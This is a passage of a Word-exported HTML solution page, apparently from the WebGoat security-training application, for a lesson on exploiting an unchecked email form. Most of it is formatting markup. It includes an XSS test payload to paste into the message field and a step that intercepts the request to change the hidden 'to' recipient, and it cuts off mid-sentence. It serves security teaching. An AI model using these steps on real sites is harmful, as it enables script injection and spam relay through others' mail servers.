+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/UncheckedEmail_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Exploit Unchecked Email <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach:</span></b><span
+style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>It is always
+a good practice to validate all inputs. Most sites allow non-authenticated users
+to send e-mail to a 'friend'. This is a great mechanism for spammers to send
+out email using your corporate mail server. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to send an obnoxious email message.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Type a
+malicious script like &lt;script&gt;alert(‘XSS’)&lt;/script&gt; and click Send!<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_168" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/UncheckedEmail_files/image002.jpg" v:shapes="Picture_x0020_168"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 5<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_169"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:270pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/UncheckedEmail_files/image003.png" o:title="" cropbottom="4085f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=360
+src="/WebGoat/lesson_solutions/UncheckedEmail_files/image004.jpg" v:shapes="Picture_x0020_169"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Part 1 completed<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The second
+part of this lesson is to send a mail to a friend from OWASP. This can be
+accomplished by intercepting the request with WebScarab and changing the hidden
+field “to” from <a href="mailto:webgoat.admin@owasp.org">webgoat.admin@owasp.org</a>
